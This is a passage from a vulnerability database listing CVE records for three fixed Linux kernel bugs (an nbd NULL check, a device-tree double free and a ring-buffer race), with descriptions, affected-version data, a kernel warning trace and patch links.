"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: null check for nla_nest_start\n\nnla_nest_start() may fail and return NULL. Insert a check and set errno\nbased on other call sites within the same source code."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:02:32.761Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/44214d744be32a4769faebba764510888f1eb19e"
},
{
"url": "https://git.kernel.org/stable/c/4af837db0fd3679fabc7b7758397090b0c06dced"
},
{
"url": "https://git.kernel.org/stable/c/98e60b538e66c90b9a856828c71d4e975ebfa797"
},
{
"url": "https://git.kernel.org/stable/c/96436365e5d80d0106ea785a4f80a58e7c9edff8"
},
{
"url": "https://git.kernel.org/stable/c/b7f5aed55829f376e4f7e5ea5b80ccdcb023e983"
},
{
"url": "https://git.kernel.org/stable/c/e803040b368d046434fbc8a91945c690332c4fcf"
},
{
"url": "https://git.kernel.org/stable/c/ba6a9970ce9e284cbc04099361c58731e308596a"
},
{
"url": "https://git.kernel.org/stable/c/31edf4bbe0ba27fd03ac7d87eb2ee3d2a231af6d"
}
],
"title": "nbd: null check for nla_nest_start",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27025",
"datePublished": "2024-05-01T12:49:28.124Z",
"dateReserved": "2024-02-19T14:20:24.210Z",
"dateUpdated": "2025-05-04T09:02:32.761Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52679 (GCVE-0-2023-52679)
Vulnerability from cvelistv5
Published
2024-05-17 14:24
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
of: Fix double free in of_parse_phandle_with_args_map
In of_parse_phandle_with_args_map() the inner loop that
iterates through the map entries calls of_node_put(new)
to free the reference acquired by the previous iteration
of the inner loop. This assumes that the value of "new" is
NULL on the first iteration of the inner loop.
Make sure that this is true in all iterations of the outer
loop by setting "new" to NULL after its value is assigned to "cur".
Extend the unittest to detect the double free and add an additional
test case that actually triggers this path.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa Version: bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52679",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T14:12:32.015310Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:37.773Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:34.539Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/26b4d702c44f9e5cf3c5c001ae619a4a001889db"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a0a061151a6200c13149dbcdb6c065203c8425d2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d5f490343c77e6708b6c4aa7dbbfbcbb9546adea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4541004084527ce9e95a818ebbc4e6b293ffca21"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b9d760dae5b10e73369b769073525acd7b3be2bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b64d09a4e8596f76d27f4b4a90a1cf6baf6a82f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cafa992134124e785609a406da4ff2b54052aff7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4dde83569832f9377362e50f7748463340c5db6b"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/of/base.c",
"drivers/of/unittest-data/tests-phandle.dtsi",
"drivers/of/unittest.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "26b4d702c44f9e5cf3c5c001ae619a4a001889db",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "a0a061151a6200c13149dbcdb6c065203c8425d2",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "d5f490343c77e6708b6c4aa7dbbfbcbb9546adea",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "4541004084527ce9e95a818ebbc4e6b293ffca21",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "b9d760dae5b10e73369b769073525acd7b3be2bd",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "b64d09a4e8596f76d27f4b4a90a1cf6baf6a82f8",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "cafa992134124e785609a406da4ff2b54052aff7",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
},
{
"lessThan": "4dde83569832f9377362e50f7748463340c5db6b",
"status": "affected",
"version": "bd6f2fd5a1d52198468c5cdc3c2472362dff5aaa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/of/base.c",
"drivers/of/unittest-data/tests-phandle.dtsi",
"drivers/of/unittest.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.17"
},
{
"lessThan": "4.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nof: Fix double free in of_parse_phandle_with_args_map\n\nIn of_parse_phandle_with_args_map() the inner loop that\niterates through the map entries calls of_node_put(new)\nto free the reference acquired by the previous iteration\nof the inner loop. This assumes that the value of \"new\" is\nNULL on the first iteration of the inner loop.\n\nMake sure that this is true in all iterations of the outer\nloop by setting \"new\" to NULL after its value is assigned to \"cur\".\n\nExtend the unittest to detect the double free and add an additional\ntest case that actually triggers this path."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:24.267Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/26b4d702c44f9e5cf3c5c001ae619a4a001889db"
},
{
"url": "https://git.kernel.org/stable/c/a0a061151a6200c13149dbcdb6c065203c8425d2"
},
{
"url": "https://git.kernel.org/stable/c/d5f490343c77e6708b6c4aa7dbbfbcbb9546adea"
},
{
"url": "https://git.kernel.org/stable/c/4541004084527ce9e95a818ebbc4e6b293ffca21"
},
{
"url": "https://git.kernel.org/stable/c/b9d760dae5b10e73369b769073525acd7b3be2bd"
},
{
"url": "https://git.kernel.org/stable/c/b64d09a4e8596f76d27f4b4a90a1cf6baf6a82f8"
},
{
"url": "https://git.kernel.org/stable/c/cafa992134124e785609a406da4ff2b54052aff7"
},
{
"url": "https://git.kernel.org/stable/c/4dde83569832f9377362e50f7748463340c5db6b"
}
],
"title": "of: Fix double free in of_parse_phandle_with_args_map",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52679",
"datePublished": "2024-05-17T14:24:43.380Z",
"dateReserved": "2024-03-07T14:49:46.887Z",
"dateUpdated": "2025-05-04T07:41:24.267Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38601 (GCVE-0-2024-38601)
Vulnerability from cvelistv5
Published
2024-06-19 13:48
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Fix a race between readers and resize checks
The reader code in rb_get_reader_page() swaps a new reader page into the
ring buffer by doing cmpxchg on old->list.prev->next to point it to the
new page. Following that, if the operation is successful,
old->list.next->prev gets updated too. This means the underlying
doubly-linked list is temporarily inconsistent, page->prev->next or
page->next->prev might not be equal back to page for some page in the
ring buffer.
The resize operation in ring_buffer_resize() can be invoked in parallel.
It calls rb_check_pages() which can detect the described inconsistency
and stop further tracing:
[ 190.271762] ------------[ cut here ]------------
[ 190.271771] WARNING: CPU: 1 PID: 6186 at kernel/trace/ring_buffer.c:1467 rb_check_pages.isra.0+0x6a/0xa0
[ 190.271789] Modules linked in: [...]
[ 190.271991] Unloaded tainted modules: intel_uncore_frequency(E):1 skx_edac(E):1
[ 190.272002] CPU: 1 PID: 6186 Comm: cmd.sh Kdump: loaded Tainted: G E 6.9.0-rc6-default #5 158d3e1e6d0b091c34c3b96bfd99a1c58306d79f
[ 190.272011] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552c-rebuilt.opensuse.org 04/01/2014
[ 190.272015] RIP: 0010:rb_check_pages.isra.0+0x6a/0xa0
[ 190.272023] Code: [...]
[ 190.272028] RSP: 0018:ffff9c37463abb70 EFLAGS: 00010206
[ 190.272034] RAX: ffff8eba04b6cb80 RBX: 0000000000000007 RCX: ffff8eba01f13d80
[ 190.272038] RDX: ffff8eba01f130c0 RSI: ffff8eba04b6cd00 RDI: ffff8eba0004c700
[ 190.272042] RBP: ffff8eba0004c700 R08: 0000000000010002 R09: 0000000000000000
[ 190.272045] R10: 00000000ffff7f52 R11: ffff8eba7f600000 R12: ffff8eba0004c720
[ 190.272049] R13: ffff8eba00223a00 R14: 0000000000000008 R15: ffff8eba067a8000
[ 190.272053] FS: 00007f1bd64752c0(0000) GS:ffff8eba7f680000(0000) knlGS:0000000000000000
[ 190.272057] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 190.272061] CR2: 00007f1bd6662590 CR3: 000000010291e001 CR4: 0000000000370ef0
[ 190.272070] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 190.272073] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 190.272077] Call Trace:
[ 190.272098] <TASK>
[ 190.272189] ring_buffer_resize+0x2ab/0x460
[ 190.272199] __tracing_resize_ring_buffer.part.0+0x23/0xa0
[ 190.272206] tracing_resize_ring_buffer+0x65/0x90
[ 190.272216] tracing_entries_write+0x74/0xc0
[ 190.272225] vfs_write+0xf5/0x420
[ 190.272248] ksys_write+0x67/0xe0
[ 190.272256] do_syscall_64+0x82/0x170
[ 190.272363] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 190.272373] RIP: 0033:0x7f1bd657d263
[ 190.272381] Code: [...]
[ 190.272385] RSP: 002b:00007ffe72b643f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
[ 190.272391] RAX: ffffffffffffffda RBX: 0000000000000002 RCX: 00007f1bd657d263
[ 190.272395] RDX: 0000000000000002 RSI: 0000555a6eb538e0 RDI: 0000000000000001
[ 190.272398] RBP: 0000555a6eb538e0 R08: 000000000000000a R09: 0000000000000000
[ 190.272401] R10: 0000555a6eb55190 R11: 0000000000000246 R12: 00007f1bd6662500
[ 190.272404] R13: 0000000000000002 R14: 00007f1bd6667c00 R15: 0000000000000002
[ 190.272412] </TASK>
[ 190.272414] ---[ end trace 0000000000000000 ]---
Note that ring_buffer_resize() calls rb_check_pages() only if the parent
trace_buffer has recording disabled. Recent commit d78ab792705c
("tracing: Stop current tracer when resizing buffer") causes that it is
now always the case which makes it more likely to experience this issue.
The window to hit this race is nonetheless very small. To help
reproducing it, one can add a delay loop in rb_get_reader_page():
ret = rb_head_page_replace(reader, cpu_buffer->reader_page);
if (!ret)
goto spin;
for (unsigned i = 0; i < 1U << 26; i++) /* inserted delay loop */
__asm__ __volatile__ ("" : : : "memory");
rb_list_head(reader->list.next)->prev = &cpu_buffer->reader_page->list;
..
---truncated---
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 Version: 659f451ff21315ebfeeb46b9adccee8ce1b52c25 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:44.865Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b50932ea673b5a089a4bb570a8a868d95c72854e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e160196042cac946798ac192a0bc3398f1aa66b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/595363182f28786d641666a09e674b852c83b4bb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54c64967ba5f8658ae7da76005024ebd3d9d8f6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af3274905b3143ea23142bbf77bd9b610c54e533"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79b52013429a42b8efdb0cda8bb0041386abab87"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c2274b908db05529980ec056359fae916939fdaa"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38601",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:13:21.471342Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:54.075Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/trace/ring_buffer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b50932ea673b5a089a4bb570a8a868d95c72854e",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "1e160196042cac946798ac192a0bc3398f1aa66b",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "595363182f28786d641666a09e674b852c83b4bb",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "54c64967ba5f8658ae7da76005024ebd3d9d8f6e",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "af3274905b3143ea23142bbf77bd9b610c54e533",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "79b52013429a42b8efdb0cda8bb0041386abab87",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
},
{
"lessThan": "c2274b908db05529980ec056359fae916939fdaa",
"status": "affected",
"version": "659f451ff21315ebfeeb46b9adccee8ce1b52c25",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/trace/ring_buffer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.5"
},
{
"lessThan": "3.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nring-buffer: Fix a race between readers and resize checks\n\nThe reader code in rb_get_reader_page() swaps a new reader page into the\nring buffer by doing cmpxchg on old-\u003elist.prev-\u003enext to point it to the\nnew page. Following that, if the operation is successful,\nold-\u003elist.next-\u003eprev gets updated too. This means the underlying\ndoubly-linked list is temporarily inconsistent, page-\u003eprev-\u003enext or\npage-\u003enext-\u003eprev might not be equal back to page for some page in the\nring buffer.\n\nThe resize operation in ring_buffer_resize() can be invoked in parallel.\nIt calls rb_check_pages() which can detect the described inconsistency\nand stop further tracing:\n\n[ 190.271762] ------------[ cut here ]------------\n[ 190.271771] WARNING: CPU: 1 PID: 6186 at kernel/trace/ring_buffer.c:1467 rb_check_pages.isra.0+0x6a/0xa0\n[ 190.271789] Modules linked in: [...]\n[ 190.271991] Unloaded tainted modules: intel_uncore_frequency(E):1 skx_edac(E):1\n[ 190.272002] CPU: 1 PID: 6186 Comm: cmd.sh Kdump: loaded Tainted: G E 6.9.0-rc6-default #5 158d3e1e6d0b091c34c3b96bfd99a1c58306d79f\n[ 190.272011] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552c-rebuilt.opensuse.org 04/01/2014\n[ 190.272015] RIP: 0010:rb_check_pages.isra.0+0x6a/0xa0\n[ 190.272023] Code: [...]\n[ 190.272028] RSP: 0018:ffff9c37463abb70 EFLAGS: 00010206\n[ 190.272034] RAX: ffff8eba04b6cb80 RBX: 0000000000000007 RCX: ffff8eba01f13d80\n[ 190.272038] RDX: ffff8eba01f130c0 RSI: ffff8eba04b6cd00 RDI: ffff8eba0004c700\n[ 190.272042] RBP: ffff8eba0004c700 R08: 0000000000010002 R09: 0000000000000000\n[ 190.272045] R10: 00000000ffff7f52 R11: ffff8eba7f600000 R12: ffff8eba0004c720\n[ 190.272049] R13: ffff8eba00223a00 R14: 0000000000000008 R15: ffff8eba067a8000\n[ 190.272053] FS: 00007f1bd64752c0(0000) GS:ffff8eba7f680000(0000) knlGS:0000000000000000\n[ 190.272057] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 190.272061] CR2: 00007f1bd6662590 CR3: 000000010291e001 CR4: 0000000000370ef0\n[ 190.272070] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 190.272073] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 190.272077] Call Trace:\n[ 190.272098] \u003cTASK\u003e\n[ 190.272189] ring_buffer_resize+0x2ab/0x460\n[ 190.272199] __tracing_resize_ring_buffer.part.0+0x23/0xa0\n[ 190.272206] tracing_resize_ring_buffer+0x65/0x90\n[ 190.272216] tracing_entries_write+0x74/0xc0\n[ 190.272225] vfs_write+0xf5/0x420\n[ 190.272248] ksys_write+0x67/0xe0\n[ 190.272256] do_syscall_64+0x82/0x170\n[ 190.272363] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[ 190.272373] RIP: 0033:0x7f1bd657d263\n[ 190.272381] Code: [...]\n[ 190.272385] RSP: 002b:00007ffe72b643f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\n[ 190.272391] RAX: ffffffffffffffda RBX: 0000000000000002 RCX: 00007f1bd657d263\n[ 190.272395] RDX: 0000000000000002 RSI: 0000555a6eb538e0 RDI: 0000000000000001\n[ 190.272398] RBP: 0000555a6eb538e0 R08: 000000000000000a R09: 0000000000000000\n[ 190.272401] R10: 0000555a6eb55190 R11: 0000000000000246 R12: 00007f1bd6662500\n[ 190.272404] R13: 0000000000000002 R14: 00007f1bd6667c00 R15: 0000000000000002\n[ 190.272412] \u003c/TASK\u003e\n[ 190.272414] ---[ end trace 0000000000000000 ]---\n\nNote that ring_buffer_resize() calls rb_check_pages() only if the parent\ntrace_buffer has recording disabled. Recent commit d78ab792705c\n(\"tracing: Stop current tracer when resizing buffer\") causes that it is\nnow always the case which makes it more likely to experience this issue.\n\nThe window to hit this race is nonetheless very small. To help\nreproducing it, one can add a delay loop in rb_get_reader_page():\n\n ret = rb_head_page_replace(reader, cpu_buffer-\u003ereader_page);\n if (!ret)\n \tgoto spin;\n for (unsigned i = 0; i \u003c 1U \u003c\u003c 26; i++) /* inserted delay loop */\n \t__asm__ __volatile__ (\"\" : : : \"memory\");\n rb_list_head(reader-\u003elist.next)-\u003eprev = \u0026cpu_buffer-\u003ereader_page-\u003elist;\n\n.. \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:02.077Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b50932ea673b5a089a4bb570a8a868d95c72854e"
},
{
"url": "https://git.kernel.org/stable/c/c68b7a442ee61d04ca58b2b5cb5ea7cb8230f84a"
},
{
"url": "https://git.kernel.org/stable/c/1e160196042cac946798ac192a0bc3398f1aa66b"
},
{
"url": "https://git.kernel.org/stable/c/595363182f28786d641666a09e674b852c83b4bb"
},
{
"url": "https://git.kernel.org/stable/c/54c64967ba5f8658ae7da76005024ebd3d9d8f6e"
},
{
"url": "https://git.kernel.org/stable/c/af3274905b3143ea23142bbf77bd9b610c54e533"
},
{
"url": "https://git.kernel.org/stable/c/5ef9e330406d3fb4f4b2c8bca2c6b8a93bae32d1"
},
{
"url": "https://git.kernel.org/stable/c/79b52013429a42b8efdb0cda8bb0041386abab87"
},
{
"url": "https://git.kernel.org/stable/c/c2274b908db05529980ec056359fae916939fdaa"
}
],
"title": "ring-buffer: Fix a race between readers and resize checks",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38601",
"datePublished": "2024-06-19T13:48:13.097Z",
